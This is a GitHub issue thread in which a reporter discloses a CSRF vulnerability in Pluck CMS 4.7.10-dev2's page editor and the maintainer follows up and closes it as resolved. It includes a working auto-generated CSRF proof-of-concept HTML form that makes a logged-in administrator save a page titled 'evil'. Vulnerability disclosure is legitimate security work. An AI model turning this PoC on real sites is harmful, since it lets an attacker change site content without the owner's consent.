An issue was discovered in Pluck 4.7.10-dev2. There is a CSRF vulnerability that can editpage via a /admin.php?action=editpage #81

F1sh1001 · 2019-10-21T08:14:08Z

CSRF POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/pluck/admin.php?action=editpage&page=111" method="POST">
      <input type="hidden" name="title" value="evil" />
      <input type="hidden" name="seo&#95;name" value="111" />
      <input type="hidden" name="content" value="evil" />
      <input type="hidden" name="description" value="" />
      <input type="hidden" name="keywords" value="" />
      <input type="hidden" name="hidden" value="no" />
      <input type="hidden" name="sub&#95;page" value="" />
      <input type="hidden" name="theme" value="oldstyle" />
      <input type="hidden" name="save" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The text was updated successfully, but these errors were encountered:

BSteelooper · 2019-10-21T08:21:43Z

Where did you insert the script?? it is a javascript so it only resides in the client.
The /h1 wil not appear in the file on disk..

Please explain more.

F1sh1001 · 2019-10-21T08:37:01Z

After the adminisstrator open the csrf exp page,then a new page called evil will be added to your website.

BSteelooper · 2019-10-21T09:57:13Z

Could you please test the latest dev release 4.7.10-dev4?
https://github.com/pluck-cms/pluck/releases/tag/4.7.10-dev4

BSteelooper · 2019-10-22T07:19:43Z

Have you retested with the latest dev version?

F1sh1001 · 2019-10-22T07:22:02Z

Sorry, I don't have much time. I'll try if I have time

…

------------------ 原始邮件 ------------------ 发件人: "Bas Steelooper"<notifications@github.com>; 发送时间: 2019年10月22日(星期二) 下午3:19 收件人: "pluck-cms/pluck"<pluck@noreply.github.com>; 抄送: "1113402387"<1113402387@qq.com>; "Author"<author@noreply.github.com>; 主题: Re: [pluck-cms/pluck] An issue was discovered in Pluck 4.7.10-dev2. There is a CSRF vulnerability that can editpage via a /admin.php?action=editpage (#81) Have you retested with the latest dev version? — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub, or unsubscribe.

BSteelooper added Password Required for exploit Unclear labels Oct 21, 2019

BSteelooper added the invalid label Oct 21, 2019

BSteelooper added Security:low and removed invalid Unclear labels Oct 21, 2019

BSteelooper pushed a commit that referenced this issue Oct 21, 2019

Issue #81, issue #82 and issue #83

14ee987

BSteelooper added the Resolved label Oct 21, 2019

BSteelooper closed this as completed Nov 1, 2019

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

An issue was discovered in Pluck 4.7.10-dev2. There is a CSRF vulnerability that can editpage via a /admin.php?action=editpage #81

An issue was discovered in Pluck 4.7.10-dev2. There is a CSRF vulnerability that can editpage via a /admin.php?action=editpage #81

F1sh1001 commented Oct 21, 2019 •

edited

Loading

BSteelooper commented Oct 21, 2019

F1sh1001 commented Oct 21, 2019

BSteelooper commented Oct 21, 2019 •

edited

Loading

BSteelooper commented Oct 22, 2019

F1sh1001 commented Oct 22, 2019 via email

An issue was discovered in Pluck 4.7.10-dev2. There is a CSRF vulnerability that can editpage via a /admin.php?action=editpage #81

An issue was discovered in Pluck 4.7.10-dev2. There is a CSRF vulnerability that can editpage via a /admin.php?action=editpage #81

Comments

F1sh1001 commented Oct 21, 2019 • edited Loading

BSteelooper commented Oct 21, 2019

F1sh1001 commented Oct 21, 2019

BSteelooper commented Oct 21, 2019 • edited Loading

BSteelooper commented Oct 22, 2019

F1sh1001 commented Oct 22, 2019 via email

F1sh1001 commented Oct 21, 2019 •

edited

Loading

BSteelooper commented Oct 21, 2019 •

edited

Loading